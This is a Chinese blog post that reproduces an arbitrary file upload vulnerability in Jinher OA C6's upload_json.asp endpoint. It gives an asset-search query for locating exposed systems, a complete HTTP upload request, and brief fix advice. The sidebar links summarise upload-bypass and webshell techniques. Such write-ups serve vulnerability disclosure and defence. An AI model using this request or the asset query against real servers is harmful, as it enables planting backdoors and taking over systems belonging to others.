金和OA C6 upload_json 任意文件上传漏洞

最新推荐文章于 2024-07-29 01:38:46 发布
最新推荐文章于 2024-07-29 01:38:46 发布
阅读量553 收藏 8
点赞数 8
分类专栏: 漏洞复现 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135480731
版权

产品介绍

金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。

漏洞概述

金和 OA C6 upload_json接口处存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限。

资产测绘

app=“Jinher-OA”

在这里插入图片描述

漏洞复现

POST /c6/KindEditor1/asp/upload_json.asp?dir=file HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Length: 369
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------494407267900182071383631703039

-----------------------------494407267900182071383631703039
Content-Disposition: form-data; name="localUrl"


-----------------------------494407267900182071383631703039
Content-Disposition: form-data; name="imgFile"; filename="vae.txt"
Content-Type: image/png

vae
-----------------------------494407267900182071383631703039--

在这里插入图片描述
访问打码的路径,访问上传文件
在这里插入图片描述
成功上传,借此可以上传任意文件。

修复建议

1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

keepb1ue
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件上传漏洞
m0_61506558的博客
08-06 623
1.1PHP代码文件上传
php forms 上传更新json_漏洞分析|通达OA 文件包含&文件上传漏洞分析
weixin_39983223的博客
12-18 73
漏洞背景近日,HSCERT监测发现通达OA在官方论坛发布了紧急通告,提供了针对部分用户反馈遭到勒索病毒攻击的补丁更新,遭受攻击的OA服务器首页被恶意篡改,伪装成OA系统错误提示页面让用户下载安装插件,同时服务器上文件被勒索病毒重命名并加密。遭受勒索的具体现象是:主页被篡改、站点文件扩展名被修改、生成一个勒索提示文本文件。漏洞分析从官网下载的补丁发现程序对/ispirit/im/uploa...
文件上传漏洞(总结)
sGanYu
07-30 1347
文件上传漏洞是什么 文件上传必须满足的条件 文件上传漏洞的危害 文件上传的种类 无验证 前端验证 .htaccess 文件头检查 MiMe绕过 双写后缀 文件上传漏洞是什么 指的是用户上传了一个可以执行的脚本,运行此脚本后获得执行服务器端命令的权限,一般用作与于在上传图片或者文件处,用户通过一些手段绕过检测机制,从而上传恶意代码并且执行 文件上传必须满足的条件 1.可以上传该文件 2.上传的路径可以知道并且可以访问 3.可执行该上传的文件 文件上传漏洞的危害 文件上传相对于
系列2:12、文件上传漏洞相关
qq_44704184的博客
04-13 736
文件上传漏洞 文件上传漏洞是指用户上传了一个可执行的脚本文件,而且通过这个脚本文件获得了执行服务器端命令的能力。 危害:黑链、挖矿、文件泄露 一、文件上传漏洞利用流程 1、找到上传的位置 2、尝试绕过校验,上传文件 3、获得文件位置 4、蚁剑连接,管理文件 二、绕过总结 总结:删除/禁用JS、修改MIME、等价扩展名、大小写、htaccess、双写、空格、点、$DATA、%00截断、OxO0截断、图片马、条件竞争等等。 后续用到的相关知识点 一、MIME用法 客户端使用: 1、GET请求不需要这个字段。 2
OA upload_json.asp存在任意文件上传漏洞
3tefanie丶zhou的博客
01-03 572
【红豆生南国,春来发枝冬凋敝,相思不如不相思。】
content-type 常见类型
小百的博客
09-05 2809
text/html : HTML格式 text/plain :纯文本格式 text/xml : XML格式 image/gif :gif图片格式 image/jpeg :jpg图片格式 image/png:png图片格式 以application开头的媒体格式类型: application/xhtml+xml :XHTML格式 application/xml: XML数据格式 application/atom+xml :Atom XML聚合格式 application/jsonJSON数据格式 appl
OA_C6_用户手册.pdf
03-05
OA_C6_用户手册,比较基本的一个介绍,适合入门级的学习以及人员培训使用。
OA 数据字典 c6
09-06
OA系统,C6数据库-数据字典,分享以供大家参考,借鉴
网络安全-文件上传漏洞的原理、攻击与防御
关注网络安全、云原生安全
08-16 1万+
介绍 文件上传漏洞是指用户上传了一个可执行的脚本文件(php、jsp、xml、cer等文件),而WEB系统没有进行检测或逻辑做的不够安全文件上传功能本身没有问题,问题在于上传后如何处理及解释文件。 分类 根据简介,主要分为上传(客户端)、解析(服务端)两大类。 上传-javascript检测 简介 通过js代码,对文件后缀进行判断。 原理 一般使用白名单或黑名单的方式,判断文件后缀,根据后缀决定用户是否上传。 攻击 Firebug插件删除判断函数 使用靶机pikachu做例子,直接通
文件上传漏洞及解析漏洞总结
weixin_34407348的博客
10-25 1568
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种***方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。文件上传后导致的常见安全问题一般有:1)上传文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执...
react 循环_React 面试指南 (上)
weixin_39647773的博客
11-30 144
使用 React 进行项目开发也有好几个项目了,趁着最近有空来对 React 的知识做一个简单的复盘。完整目录概览React 是单向数据流还是双向数据流?它还有其他特点吗?setStateReact 通过什么方式来更新数据React 不能直接修改 State 吗?setState 是同步还是异步的?setState 小测React 生命周期constructor (构造函数)static getD...
JSON劫持漏洞(详细讲解利用JSON从而进行数据劫持的漏洞攻防策略)
热门推荐
程宇寒
05-24 2万+
英文原文:JSON Hijacking英汉对照:JSON Hijacking 翻译对照原文解析:JSON劫持漏洞分析和攻防演练声明(阅读前必读!!!):转载自这篇文章本人是一个英语渣,英语四级都没过。翻译此文存粹用于英语学习,而且大部分还是用翻译软件翻译的。请谨慎阅读此译文,注意不要被译文雷到。另外这是一篇2009年的老文章了,里面有部分知识可能已经过时了,不过文章中关于JSON劫持的知识大部分还...
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 824
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
WEB安全】 PHP基础完整教学上(超详细)
weixin_60838266的博客
07-28 726
本文为Web安全学习中需要了解的php知识提高学习,PHP:Hypertext Preprocessor,中文名:“超文本预处理器”是一种通用开源脚本语言。语法吸收了C语言、java和Perl的特点,利于学习,使用广泛,主要适用于web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用)文档中去执行,执行效率比完全生成HTML标记的CGI要高许多;PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
WEB安全】 PHP基础文件知识完整教学中(超详细)
最新发布
weixin_60838266的博客
07-29 607
正则表达式是用于描述字符排列和匹配模式的一种语法规则。它主要用于字符串的模式分割、匹配、查找及替换操作。到目前为止,我们前面所用过的精确(文本)匹配也是一种正则表达式。在PHP中,正则表达式一般是由正规字符和一些特殊字符(类似于通配符)联合构成的一个文本模式的程序性描述。正则表达式较重要和较有用的角色是验证用户数据的有效性检查。PHP中,正则表达式有三个作用:匹配,也常常用于从字符串中析取信息。用新文本代替匹配文本。将一个字符串拆分为一组更小的信息块。
OA_C6_用户入门指南
"OA_C6_用户手册.pdf" 和协同管理平台专业版C6/P是一款企业级的办公自动化系统,旨在提升企业的协同工作效率。该用户手册详细介绍了系统的使用方法,适合入门级用户和新员工培训。手册涵盖的内容广泛,帮助...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值